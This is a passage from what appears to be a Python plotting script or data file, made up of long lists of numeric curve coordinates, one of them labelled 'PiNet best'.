0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 
0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.125, 0.125, 0.125, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.05357142857142857, 0.05357142857142857, 0.05357142857142857, 0.05357142857142857, 0.05357142857142857, 0.05357142857142857, 0.05357142857142857, 0.03571428571428571, 0.03571428571428571, 0.017857142857142856, 
0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] , [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 
0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.921875, 0.921875, 0.921875, 0.921875, 0.921875, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.890625, 0.875, 0.859375, 0.859375, 0.859375, 0.859375, 0.84375, 0.828125, 0.828125, 0.828125, 0.828125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.796875, 0.796875, 0.78125, 0.78125, 0.765625, 0.765625, 0.765625, 0.765625, 0.765625, 0.75, 0.75, 0.75, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.71875, 0.71875, 0.71875, 0.71875, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.6875, 0.671875, 0.671875, 0.671875, 0.671875, 0.671875, 0.671875, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.640625, 0.640625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.609375, 0.609375, 0.59375, 0.59375, 0.59375, 0.578125, 0.578125, 0.546875, 0.546875, 0.53125, 0.53125, 0.515625, 0.484375, 0.484375, 0.484375, 0.484375, 0.46875, 0.453125, 0.453125, 0.453125, 0.453125, 0.453125, 0.453125, 
0.453125, 0.453125, 0.453125, 0.4375, 0.4375, 0.4375, 0.421875, 0.40625, 0.40625, 0.40625, 0.40625, 0.40625, 0.40625, 0.40625, 0.390625, 0.390625, 0.390625, 0.390625, 0.390625, 0.390625, 0.390625, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.34375, 0.34375, 0.34375, 0.34375, 0.34375, 0.34375, 0.34375, 0.328125, 0.328125, 0.3125, 0.3125, 0.296875, 0.296875, 0.296875, 0.296875, 0.296875, 0.296875, 0.296875, 0.296875, 0.265625, 0.265625, 0.25, 0.25, 0.25, 0.25, 0.25, 0.234375, 0.21875, 0.203125, 0.203125, 0.203125, 0.203125, 0.203125, 0.203125, 0.203125, 0.1875, 0.1875, 0.1875, 0.171875, 0.15625, 0.15625, 0.140625, 0.109375, 0.109375, 0.09375, 0.09375, 0.09375, 0.09375, 0.078125, 0.078125, 0.078125, 0.078125, 0.078125, 0.078125, 0.078125, 0.078125, 0.078125, 0.0625, 0.0625, 0.0625, 0.0625, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.03125, 0.03125, 0.03125, 0.03125, 0.03125, 0.015625, 0.015625, 0.015625, 0.015625, 0.015625, 0.015625, 0.015625, 0.015625, 0.015625, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0] # PiNet best x4, y4 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 
0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.08064516129032258, 0.08064516129032258, 0.08064516129032258, 0.08064516129032258, 0.08064516129032258, 0.08064516129032258, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 
0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 
0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1935483870967742, 0.1935483870967742, 0.1935483870967742, 0.1935483870967742, 0.1935483870967742, 0.1935483870967742, 0.1935483870967742, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 
0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 
0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3387096774193548, 0.3387096774193548, 0.3387096774193548, 0.3387096774193548, 0.3387096774193548, 0.3387096774193548, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.4032258064516129, 0.4032258064516129, 0.41935483870967744, 0.41935483870967744, 0.41935483870967744, 0.41935483870967744, 0.41935483870967744, 0.43548387096774194, 0.43548387096774194, 0.43548387096774194, 0.45161290322580644, 0.45161290322580644, 0.45161290322580644, 0.45161290322580644, 0.45161290322580644, 0.46774193548387094, 0.46774193548387094, 0.46774193548387094, 0.46774193548387094, 0.46774193548387094, 0.46774193548387094, 0.46774193548387094, 0.4838709677419355, 0.5161290322580645, 0.5161290322580645, 0.5161290322580645, 0.5161290322580645, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.5483870967741935, 0.5483870967741935, 0.5483870967741935, 0.5483870967741935, 0.5645161290322581, 